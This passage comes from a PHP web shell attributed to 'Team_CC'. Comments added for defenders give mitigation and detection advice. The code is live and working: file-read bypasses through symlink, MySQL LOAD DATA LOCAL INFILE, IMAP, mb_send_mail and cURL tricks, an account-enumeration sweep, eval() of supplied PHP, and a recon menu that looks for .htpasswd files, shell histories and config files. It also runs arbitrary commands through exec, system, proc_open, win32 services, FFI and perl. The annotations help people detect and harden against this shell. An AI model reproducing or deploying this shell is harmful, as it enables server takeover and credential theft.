  594. $tempFile = uniqid();
  595. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  596. error_log(file_get_contents($path), 3, $tempFile);
  597. $content = file_get_contents($tempFile);
  598. unlink($tempFile);
  599. return $content;
  600. }
  // File-read variant using a symbolic link.
  // Creates a link named by uniqid() in the current directory that points at
  // $path, reads through the link, then removes it. Returns the content, or
  // nothing when symlink() is unavailable.
  // Mitigation: keep symlink() out of reach of web applications that do not
  // need it, and have the web server refuse links not owned by the site user.
  601. function SymlinkF($path) {
  602. $tempFile = uniqid();
  603. if(function_exists('symlink')) {
  604. symlink($path,$tempFile);
  605. $content = file_get_contents($tempFile);
  606. unlink($tempFile);
  607. return $content;
  608. }
  609. }
  // File-read variant that uses the database client instead of PHP file I/O.
  // Connects with the global $DBhost/$DBuser/$DBpass, creates database "a" and
  // table a.a, loads $path with LOAD DATA LOCAL INFILE ($path is concatenated
  // into the statement), prints every row, then drops the database.
  // Mitigation: disable local_infile on server and client, and do not give web
  // application accounts CREATE/DROP/GRANT privileges.
  // Detection: database audit entries for CREATE DATABASE a or LOAD DATA LOCAL
  // INFILE coming from the web application account.
  610. function MySQLReader($path) {
  611. global $DBhost,$DBuser,$DBpass;
  612. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  613. $con = mysql_connect($DBhost,$DBuser,$DBpass);
  614. mysql_query("CREATE DATABASE a");
  615. mysql_query("CREATE TABLE a.a (a varchar(1024))");
  616. mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
  617. mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
  618. $result = mysql_query("SELECT a FROM a.a");
  619. while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
  620. mysql_query("DROP DATABASE a");
  621. }
  // mysqli counterpart of the LOAD DATA LOCAL INFILE read.
  // Creates database "a" and table a.a over the legacy mysql_* connection, then
  // opens a mysqli connection with MYSQLI_OPT_LOCAL_INFILE enabled and
  // registers r() as the local-infile handler; r() prints the bytes it is
  // given. The database is not dropped afterwards in this function.
  // Mitigation: disable local_infile for the server and for the PHP MySQL
  // clients, and use least-privilege database accounts.
  622. function MySQLIReader($path) {
  623. global $DBhost,$DBuser,$DBpass;
  624. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  625. $con = mysql_connect($DBhost,$DBuser,$DBpass);
  626. mysql_query("CREATE DATABASE a");
  627. mysql_query("CREATE TABLE a.a (a varchar(1024))");
  628.  
  629. function r($fp, &$buf, $len, &$err) {
  630. print fread($fp, $len);
  631. }
  632. $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
  633. $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
  634. $m->set_local_infile_handler("r");
  635. $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
  636. $m->close();
  637. }
  // Opens a persistent MySQL connection and selects $db.
  // Returns false after echoing a failure message, true on success. The failure
  // message includes the host, user and password that were tried, so those
  // values end up in the HTTP response. The statement after `return true;` is
  // never reached.
  638. function DBConnect($host,$user,$pass,$db) {
  639. $connect = mysql_pconnect($host,$user,$pass);
  640. if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false; }
  641. else {
  642. $tryToSelectDB = mysql_select_db($db,$connect);
  643. if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false; }
  644. else{return true; return $connect;}
  645. }
  646. }
  // Account enumeration without touching /etc/passwd directly: asks
  // posix_getpwuid() for every uid from 0 to 59999 and concatenates the field
  // values it gets back. $path is not used.
  // NOTE(review): eah() is not defined anywhere in the visible source.
  // Mitigation: the POSIX extension is rarely needed by web applications and
  // can be left out or disabled for them.
  647. function ReadId($path) {
  648. for($uid=0;$uid<60000;$uid++) {
  649. $ara = posix_getpwuid($uid);
  650. if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
  651. }
  652. }
  653. return $content;
  654. }
  // File-read variant through the IMAP extension: passes $path to imap_open()
  // as the mailbox with empty credentials and returns the body of message 1.
  // NOTE(review): presumably relies on the mailbox string being treated as a
  // local file by the underlying mail library; confirm for the deployed build.
  // Mitigation: do not load the imap extension where it is not required.
  655. function ImapF($path) {
  656. $stream = imap_open($path, "", "");
  657. $str = imap_body($stream, 1);
  658. imap_close($stream);
  659. return $str;
  660. }
  // File-read variant using file(): reads $path into an array of lines and
  // returns them concatenated into one string.
  661. function FileF($path) {
  662. $lines = file($path); foreach($lines as $line){$content .= $line;}
  663. return $content;
  664. }
  // File-read variant using copy(): copies $path to a temporary file named
  // md5(uniqid()) with a ".bb" suffix in the current directory, reads it back
  // and deletes it. Returns the content.
  // Detection: transient 32-hex-character ".bb" files next to the script.
  665. function CopyF($path) {
  666. $tempFile = md5(uniqid()).".bb";
  667. copy($path,$tempFile);
  668. $content = file_get_contents($tempFile);
  669. unlink($tempFile);
  670. return $content;
  671. }
  // Concatenates the results of repeated fgetss() calls on $path and returns
  // them. The visible dispatcher calls fgetss() directly and does not reference
  // this helper.
  672. function fgetssF($path) {
  673. while(($line = fgetss($path)) != false){$content .= $line;}
  674. return $content;
  675. }
  // File-read variant: thin wrapper that returns the result of
  // highlight_file($path).
  676. function highlightFile($path) {
  677. return highlight_file($path);
  678. }
  // File-read variant that abuses the extra-parameters argument of
  // mb_send_mail(): it builds "-C <path> -X <cwd>/<temp file>" and passes it as
  // the fifth argument, then reads and deletes the temporary file. Returns the
  // content, or nothing when mb_send_mail() is unavailable.
  // NOTE(review): presumably depends on the local mail binary interpreting -C
  // and -X as configuration-file and log-file options; confirm for the MTA in
  // use.
  // Mitigation: disable the mail functions for applications that do not send
  // mail, and audit any code path that lets request data reach the
  // additional-parameters argument.
  679. function mbSendEmail($path) {
  680. if(function_exists('mb_send_mail')) {
  681. $tempFile = uniqid();
  682. $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
  683. mb_send_mail("[email protected]", NULL, NULL, NULL, $additional_param);
  684. $content = file_get_contents($tempFile);
  685. unlink($tempFile);
  686. return $content;
  687. }
  688. }
  // Deletes $fileName with unlink() and, when that fails, falls back to a shell
  // command through Exe() ("del" on Windows, "rm -f" on Linux). The file name is
  // interpolated into the command string without escaping. Returns true or
  // false depending on the last result.
  689. function DeleteFile($fileName) {
  690. global $os;
  691. if(function_exists('unlink'))
  692. {$delete = unlink($fileName);}
  693. if((!$delete) && ($os == 'Windows'))
  694. {$delete = Exe("del $fileName"); }
  695. else if((!$delete) && ($os == 'Linux'))
  696. {$delete = Exe("rm -f $fileName");}
  697. if($delete){return true;}else{return false;}
  698. }
  // File-read variant through cURL: requests a file:// URL built from $path
  // followed by a NUL byte and this script's own path, and var_dump()s the
  // result. Returns nothing.
  // NOTE(review): the embedded NUL byte looks like a legacy path-check
  // truncation trick; confirm whether the deployed PHP/libcurl still accepts it.
  // Mitigation: keep PHP and libcurl current.
  699. function CurlFileRead($path) {
  700. $ch = curl_init("file://".$path."\x00".__FILE__);
  701. var_dump(curl_exec($ch));
  702. }
  // Opens $path with mode 'r+' and calls fread(); the escaped result is neither
  // stored, printed nor returned, so the function produces no output as written.
  703. function FReadF($path) {
  704. $file = fopen($path,'r+'); //Open The File
  705. if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
  706. fclose($file);
  707. }
  // File-read variant using the compress.zlib:// stream wrapper: copies $path
  // through the wrapper into a tempnam() file (prefix "cx") under the global
  // $dir, reads it back, deletes it, and returns the HTML-escaped content.
  // $filename is never assigned inside this function. Returns nothing when the
  // copy fails.
  // Detection: temporary files with the "cx" prefix in web directories.
  708. function TempnameF($path) {
  709. global $dir;
  710. $temp = tempnam($dir, "cx");
  711. if(copy("compress.zlib://".$path, $temp)) {
  712. $handler = fopen($temp, "r");
  713. $readFile = fread($handler, @filesize($temp));
  714. fclose($handler);
  715. $content .= htmlspecialchars($filename);
  716. $content .= nl2br(htmlspecialchars($readFile));
  717. $content .= htmlspecialchars($filename);
  718. unlink($temp);
  719. return $content;
  720. }
  721. }
  // Arbitrary PHP execution primitive: strips PHP open/close tags from the
  // supplied string and passes it to eval(). Returns true when eval() yields a
  // truthy value, false otherwise.
  // Defensive note: eval is a language construct, so disable_functions does not
  // block it; detection has to come from file-integrity monitoring and static
  // scanning for eval() on request-derived data.
  722. function Evaluation($eval) {
  723. $eval = str_replace(array("<?php","<?","?>"),"",$eval);
  724. $eval = eval($eval);
  725. if($eval){return true;}else{return false;}
  726. }
  // Environment probe: returns an HTML "ON"/"OFF" label depending on whether
  // ocilogon() exists.
  727. function Oracle() {
  728. if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
  729. else {$oracle = '<font color="green">OFF</font>';}return $oracle;
  730. }
  // Environment probe: returns an HTML "ON"/"OFF" label depending on whether
  // mssql_connect() exists.
  731. function MsSQL() {
  732. if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
  733. else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
  734. }
  // Environment probe: returns an HTML "ON"/"OFF" label depending on whether
  // mysql_connect() exists.
  735. function MySQL2() {
  736. $mysql_try = function_exists('mysql_connect');
  737. if($mysql_try){$mysql = '<font color="red">ON</font>';}
  738. else {$mysql = '<font color="green">OFF</font>';}return $mysql;
  739. }
  // Environment probe: returns an HTML "ON"/"OFF" label depending on whether
  // msql_connect() exists.
  740. function MSQL() {
  741. if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
  742. else {$mSql = '<font color="green">OFF</font>';}return $mSql;
  743. }
  // Environment probe: returns an HTML "ON"/"OFF" label depending on whether
  // mysqli_connect() exists.
  744. function MysqlI() {
  745. if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
  746. else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
  747. }
  // Environment probe: returns an HTML "ON"/"OFF" label depending on whether
  // gzencode() exists.
  748. function Gzip() {
  749. if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
  750. else {$gzip = '<font color="green">OFF</font>';}return $gzip;
  751. }
  // Environment probe: reads the open_basedir setting and returns an HTML
  // "ON" label when it has a value, "OFF" when it is empty.
  752. function openBaseDir() {
  753. $openBaseDir = ini_get("open_basedir");
  754. if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
  755. else {$openBaseDir = '<font color="red">ON</font>';}
  756. return $openBaseDir;
  757. }
  // Environment probe: returns an HTML "ON"/"OFF" label depending on whether
  // the curl extension is loaded.
  758. function Curl() {
  759. if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
  760. else{$curl = '<font color="green">OFF</font>';}return $curl;
  761. }
  // Environment probe: when get_magic_quotes_gpc() exists its value is read,
  // and an HTML "ON" label is returned if that value is non-empty, otherwise
  // "OFF".
  762. function magicQouts() {
  763. if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
  764. if (empty($mag)){$mag = '<font color="green">OFF</font>';}
  765. else {$mag= '<font color="red">ON</font>';}return $mag;
  766. }
  // Environment probe: reads the safe_mode setting and returns an HTML "ON"
  // label when it is set, "OFF" otherwise. The result is shown in the status
  // table of the page.
  767. function SafeMode() {
  768. $safe_mode = ini_get("safe_mode");
  769. if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
  770. else {$safe_mode = '<font color="red">ON</font>';}
  771. return $safe_mode;
  772. }
  // Environment probe: returns the raw disable_functions ini string, or an
  // HTML "NONE" label when it is empty. The page splits the returned string on
  // commas to fill the "disable functions" drop-down.
  773. function DisableFunctions() {
  774. $disfun = ini_get('disable_functions');
  775. if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
  776. }
  // Environment probe: returns an HTML "ON"/"OFF" label for the
  // register_globals ini setting.
  777. function RegisterGlobals() {
  778. if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
  779. else{$registerg= '<font color="green">OFF</font>';}return $registerg;
  780. }
  // Returns the visitor address, preferring HTTP_X_FORWARDED_FOR, then
  // HTTP_CLIENT_IP, then REMOTE_ADDR. The first two come from client-supplied
  // headers, so the value is not trustworthy. The page uses it for the "Your IP"
  // cell and as the default address in the back-connection form.
  // NOTE(review): the environment names are written as bare, unquoted
  // identifiers; how they resolve depends on the PHP version.
  781. function GetRealIP() {
  782. if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
  783. elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
  784. else {$ip=getenv(REMOTE_ADDR);}
  785. return $ip;
  786. }
  787. function SelectCommand($os) {
       // Echoes a <select name='alias'> of preset command lines; the page's
       // AddAlias() script copies the chosen value into the CMD_Line field.
       // The $os parameter is immediately rebound by `global $os`, so the global
       // value ("Windows" or anything else) decides which list is printed.
       //
       // Defender note: the presets are a checklist of what the operator goes
       // looking for after access -- SUID/SGID binaries, world-writable paths,
       // web and service config files, .htpasswd, shell and MySQL history,
       // backups and dumps. On a host where this file was found, treat those
       // file classes as exposed (rotate the credentials they hold), and use
       // these command strings as hunting terms in process-audit data for
       // children of the web server account.
  788. global $os;
  789. if($os == 'Windows') {
  790. echo "
  791. <select name='alias' id='alias' onChange='AddAlias();' >
  792. <option value=''>NONE</option>
  793. <option value='dir' >List Directory</option>
  794. <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
  795. <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</option>
  796. <option value='netstat -an'>Show active connections</option>
  797. <option value='net start'>Show running services</option>
  798. <option value='tasklist'>Show Pro</option>
  799. <option value='net user'>User accounts</option>
  800. <option value='net view'>Show computers</option>
  801. <option value='arp -a'>ARP Table</option>
  802. <option value='ipconfig /all'>IP Configuration</option>
  803. <option value='netstat -an'>netstat -an</option>
  804. <option value='systeminfo'>System Informations</option>
  805. <option value='getmac'>Get Mac Address</option>
  806. </select>
  807. ";
  808. }
  809. else {
  810. echo "
  811. <select name='alias' id='alias' onChange='AddAlias();' >
  812. <option value=''>NONE</option>
  813. <option value='ls -la'>List dir</option>
  814. <option value='cat /etc/hosts'>IP Addresses</option>
  815. <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
  816. <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
  817. <option value='netstat -an | grep -i listen'>show opened ports</option>
  818. <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
  819. <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
  820. <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
  821. <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
  822. <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
  823. <option value='find / -type f -name \"config*\"'>find config* files</option>
  824. <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
  825. <option value='find / -perm -2 -ls'>find all writable folders and files</option>
  826. <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
  827. <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
  828. <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
  829. <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
  830. <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
  831. <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
  832. <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
  833. <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
  834. <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
  835. <option value='locate httpd.conf'>locate httpd.conf files</option>
  836. <option value='locate vhosts.conf'>locate vhosts.conf files</option>
  837. <option value='locate proftpd.conf'>locate proftpd.conf files</option>
  838. <option value='locate psybnc.conf'>locate psybnc.conf files</option>
  839. <option value='locate my.conf'>locate my.conf files</option>
  840. <option value='locate admin.php'>locate admin.php files</option>
  841. <option value='locate cfg.php'>locate cfg.php files</option>
  842. <option value='locate conf.php'>locate conf.php files</option>
  843. <option value='locate config.dat'>locate config.dat files</option>
  844. <option value='locate config.php'>locate config.php files</option>
  845. <option value='locate config.inc'>locate config.inc files</option>
  846. <option value='locate config.inc.php'>locate config.inc.php</option>
  847. <option value='locate config.default.php'>locate config.default.php files</option>
  848. <option value='locate config'>locate config* files </option>
  849. <option value='locate \".conf\"'>locate .conf files</option>
  850. <option value='locate \".pwd\"'>locate .pwd files</option>
  851. <option value='locate \".sql\"'>locate .sql files</option>
  852. <option value='locate \".htpasswd\"'>locate .htpasswd files</option>
  853. <option value='locate \".bash_history\"'>locate .bash_history files</option>
  854. <option value='locate \".mysql_history\"'>locate .mysql_history files</option>
  855. <option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
  856. <option value='locate backup'>locate backup files</option>
  857. <option value='locate dump'>locate dump files</option>
  858. <option value='locate priv'>locate priv files</option>
  859. </select>
  860. ";
  861. }
  862. }
  863. function CSS($sh3llColor) {
       // Builds and returns (does not echo) the page's <style> block plus four
       // inline JavaScript helpers. $sh3llColor is concatenated into the CSS as
       // the accent colour for the `sy` tag, #Box, input borders and links.
       //
       // The script helpers reveal the request shapes the UI generates:
       //   openPHPInfo()     -> opens "?info=getPhpInfo" (the page header calls
       //                        phpinfo() whenever $_GET['info'] is set)
       //   change_dir_mode() -> navigates to "?dir_mode=<value>"
       //   AddAlias()        -> copies the 'alias' select value into 'CMD_Line'
       //   addUploadInput()  -> appends another file input named uploadfile[]
       // Defender note: the query parameters `info` and `dir_mode`, the multipart
       // field `uploadfile[]` and the element ids above are usable as terms when
       // hunting through access logs, WAF logs or file content.
  864. $css = "
  865. <style>
  866. BODY
  867. {
  868. FONT-FAMILY: Verdana;
  869. margin: 2;
  870. background-color: #000000;
  871. color:white;
  872. font-size:10pt;
  873. }
  874. sy
  875. {
  876. color:".$sh3llColor.";
  877. font-size:7pt;
  878. }
  879. #Box
  880. {
  881. color:".$sh3llColor.";
  882. background-color:#000;
  883. font-size:14px;
  884. font-weight:bold;
  885.  
  886. border:none;
  887. }
  888. table
  889. {
  890. border:none;
  891. BORDER: #eeeeee outset;
  892. BACKGROUND-COLOR: #000000;
  893. color: #cccccc;
  894. font-size:10px;
  895. }
  896. tr
  897. {
  898. BORDER-RIGHT: #cccccc 1px solid;
  899. BORDER-TOP: #cccccc 1px solid;
  900. BORDER-LEFT: #cccccc 1px solid;
  901. BORDER-BOTTOM: #cccccc 1px solid;
  902. color: #ffffff;
  903. }
  904. td
  905. {
  906. BORDER-RIGHT: #cccccc 1px solid;
  907. BORDER-TOP: #cccccc 1px solid;
  908. BORDER-LEFT: #cccccc 1px solid;
  909. BORDER-BOTTOM: #cccccc 1px solid;
  910. color: #cccccc;
  911. }
  912.  
  913. input
  914. {
  915. BORDER-RIGHT: ".$sh3llColor." 1px solid;
  916. BORDER-TOP: ".$sh3llColor." 1px solid;
  917. BORDER-LEFT: ".$sh3llColor." 1px solid;
  918. BORDER-BOTTOM: ".$sh3llColor." 1px solid;
  919. BACKGROUND-COLOR: #333333;
  920. font: 9pt tahoma;
  921. color: #ffffff;
  922. }
  923. select
  924. {
  925. BORDER-RIGHT: #ffffff 1px solid;
  926. BORDER-TOP: #999999 1px solid;
  927. BORDER-LEFT: #999999 1px solid;
  928. BORDER-BOTTOM: #ffffff 1px solid;
  929. BACKGROUND-COLOR: #000000;
  930. font: 9pt tahoma;
  931. color: #CCCCCC;;
  932. }
  933. submit
  934. {
  935. BORDER: 1px outset buttonhighlight;
  936. BACKGROUND-COLOR: #272727;
  937. width: 40%;
  938. color: #cccccc;
  939. }
  940. textarea
  941. {
  942. BORDER-RIGHT: #ffffff 1px solid;
  943. BORDER-TOP: #999999 1px solid;
  944. BORDER-LEFT: #999999 1px solid;
  945. BORDER-BOTTOM: #ffffff 1px solid;
  946. BACKGROUND-COLOR: #333333;
  947. color: #ffffff;
  948. }
  949. .Save{
  950. width:500px;
  951. border-color:red;
  952. }
  953. A:link {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  954. A:visited { COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  955. A:active {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  956. A:hover {color:blue;TEXT-DECORATION: none;}
  957. </style>
  958. <script>
  959. function openPHPInfo(){my_window= window.open (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\"); }
  960. function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
  961. function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>'; }
  962. function change_dir_mode() {
  963. var dir_mode = document.getElementById('dir_mode').value;
  964. document.location = '?dir_mode='+dir_mode;
  965. }
  966. </script>
  967. ";
  968. return $css;
  969. }
  970. function filter($string) {
       // Despite the name this is not a sanitiser: it only undoes magic-quotes
       // escaping (stripslashes when get_magic_quotes_gpc() is non-zero) and
       // otherwise returns the input unchanged. Its purpose is to deliver request
       // data to the callers exactly as the operator typed it -- the page header
       // uses it on $_POST['curDir'] and Exe() uses it on the command string.
  971. if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
  972. else{return $string; }
  973. }
  974. function footer() {
       // Echoes the closing banner table and the </body></html> tags; there is no
       // return statement, so the function's value is null.
       // Defender note: the banner text and the group URL below are static
       // attribution strings and make simple content signatures for locating
       // unmodified copies of this file on disk. The e-mail address is masked as
       // "[email protected]" in this copy of the page.
  975. echo '
  976. <table width="100%">
  977. <tr>
  978. <td width="100%"><center>
  979. <sy> ~~<< </sy>Official Shell by Team_CC<sy> >>~~</sy></b><br/>
  980. <sy> ~~<< </sy><a href="http://https://www.facebook.com/groups/186584231515603" target="_blank">https://www.facebook.com/groups/186584231515603</a><sy> >>~~</sy></b><br />
  981. <sy> ~~<< </sy>[email protected]<sy> >>~~</sy></b>
  982. </center></td>
  983. </tr>
  984. </table>
  985. </body></html>
  986. ';
  987. }
  988. function print_exe_method() {
        // Emits the <select name="exe_method"> control and marks the entry equal
        // to the global $exec_method as selected. When the global $os is "Linux"
        // eight options are listed; otherwise twelve, adding the Windows-only
        // win_shell_execute, win32_create_service, ffi and slash_bypass entries.
        // The page header reads the submitted value from $_POST['exe_method'] and
        // Exe() dispatches on it.
        // Defender note: a POST body carrying `exe_method` with one of these
        // values is a request-level indicator for this shell family and can be
        // matched in WAF rules or request-body logging.
  989. global $os; global $exec_method;
  990. if($os == "Linux") {
  991. ?>
  992. <select name="exe_method" >
  993. <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  994. <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
  995. <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
  996. <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  997. <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  998. <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  999. <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  1000. <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  1001. </select>
  1002. <?php
  1003. } else {
  1004. ?>
  1005. <select name="exe_method" >
  1006. <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  1007. <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
  1008. <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
  1009. <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  1010. <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  1011. <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  1012. <option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
  1013. <option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
  1014. <option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
  1015. <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  1016. <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  1017. <option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
  1018. </select>
  1019. <?php
  1020. }
  1021. }
  1022. function Exe($command) {
        // Central command dispatcher: passes $command to the execution primitive
        // named by the global $exec_method and echoes whatever comes back.
        // $command only goes through filter(), which reverses magic-quotes
        // escaping; nothing here validates or restricts it.
        //
        // Branches: the PHP built-ins exec/system/shell_exec/passthru/popen, the
        // local proc_exec() wrapper around proc_open, and extension-dependent
        // routes (winshell, srvshell, ffishell, perlshell, python_eval,
        // slashBypass). python_eval() is not defined in the visible part of the
        // file. The popen branch appends to $result without initialising it and
        // runs the output through convert_cyr_string(..., "d", "w").
        //
        // Defender note: because the method is selectable per request, blocking
        // one function is not enough -- disable_functions has to list every
        // built-in used here, and the optional extensions behind the other
        // branches should simply not be installed on a web server. For detection,
        // alert on the PHP/web-server process spawning a shell or cmd.exe child;
        // that holds regardless of which branch was taken.
  1023. global $dir;global $os;global $exec_method;
  1024. $command = filter($command);
  1025.  
  1026. if($exec_method == "exec") {
  1027. exec($command,$output);echo join("\n",$output);
  1028. } else if($exec_method == "system") {
  1029. system($command);
  1030. } else if($exec_method == "shell_exec") {
  1031. echo shell_exec($command);
  1032. } else if($exec_method == "passthru") {
  1033. passthru($command);
  1034. } else if($exec_method == "proc_open") {
  1035. echo proc_exec($command,$dir);
  1036. } else if($exec_method == "popen") {
  1037. $fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
  1038. } else if($exec_method == "win_shell_execute") {
  1039. echo winshell($command);
  1040. } else if($exec_method == "win32_create_service") {
  1041. echo srvshell($command);
  1042. } else if($exec_method == "ffi") {
  1043. echo ffishell($command);
  1044. } else if($exec_method == "perl") {
  1045. echo perlshell($command);
  1046. } else if($exec_method == "python") {
  1047. echo python_eval("import os\nos.system('".$command."')");
  1048. } else if($exec_method == "slash_bypass") {
  1049. echo slashBypass($command);
  1050. }
  1051. }
  1052. function proc_exec($com , $dir) {
        // Runs $com through proc_open() with $dir as the working directory and
        // returns everything read from the child's stdout pipe ($pipes[1]).
        // Only descriptors 0 and 1 are declared, both as "w" pipes; stderr is not
        // captured. The pipes and the process handle are not closed here.
  1053. $start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
  1054. $process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
  1055. return stream_get_contents($pipes[1]);
  1056. }
  1057. function winshell($command) {
        // Windows route via win_shell_execute(): starts `cmd.exe /C $command` with
        // output redirected to a scratch file, waits a fixed one second, reads the
        // file back and removes it. whereistmP() and DeleteFile() are helpers
        // defined outside the visible part of the file; the former presumably
        // returns a temp directory -- not verifiable here.
        // Defender note: the scratch file is named "NJ" followed by a uniqid()
        // value, so short-lived NJ-prefixed files in a temp directory together
        // with cmd.exe launched from the web server process are the artifacts of
        // this branch.
  1058. $name=whereistmP()."\\".uniqid('NJ');
  1059. win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
  1060. sleep(1);
  1061. $exec=file_get_contents($name);
  1062. DeleteFile($name);
  1063. return $exec;
  1064. }
  1065. function srvshell($command) {
        // Windows route via the win32service extension: registers a throw-away
        // service whose binary is cmd.exe (taken from $_SERVER['ComSpec'], with a
        // hard-coded d:\windows\system32\cmd.exe fallback) and whose parameters
        // run $command with output redirected to a scratch file. The service is
        // started, stopped and deleted immediately, then the function polls once
        // per second -- with no timeout -- until the scratch file exists.
        // Defender note: both the service name and the scratch file are "NJ" plus
        // a uniqid() value. Service-install records in the Windows System event
        // log (Service Control Manager, event ID 7045) showing an NJ-prefixed
        // name with cmd.exe as the image path are a high-confidence indicator,
        // and creation of services by a web server account should alert by itself.
  1066. $name=whereistmP()."\\".uniqid('NJ');
  1067. $n=uniqid('NJ');
  1068. $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
  1069. win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
  1070. win32_start_service($n);
  1071. win32_stop_service($n);
  1072. win32_delete_service($n);
  1073. while(!file_exists($name))sleep(1);
  1074. $exec=file_get_contents($name);
  1075. DeleteFile($name);
  1076. return $exec;
  1077. }
  1078. function ffishell($command) {
        // Windows route through a foreign-function binding: declares WinExec from
        // kernel32.dll via `new ffi(...)` and uses it to launch
        // `cmd.exe /c $command` with output redirected to an NJ-prefixed scratch
        // file, then polls once per second (no timeout) until the file exists,
        // reads it and deletes it.
        // NOTE(review): the "[lib='...']" declaration syntax looks like the legacy
        // PECL ffi extension rather than the FFI class bundled since PHP 7.4 --
        // confirm before relying on that for scoping.
        // Defender note: this path does not go through any function that
        // disable_functions would normally list; the mitigation is not having an
        // FFI extension available to web-facing PHP.
  1079. $name=whereistmP()."\\".uniqid('NJ');
  1080. $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  1081. $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
  1082. while(!file_exists($name))sleep(1);
  1083. $exec=file_get_contents($name);
  1084. DeleteFile($name);
  1085. return $exec;
  1086. }
  1087. function perlshell($command) {
        // Route through an embedded Perl interpreter: instantiates a `perl` object
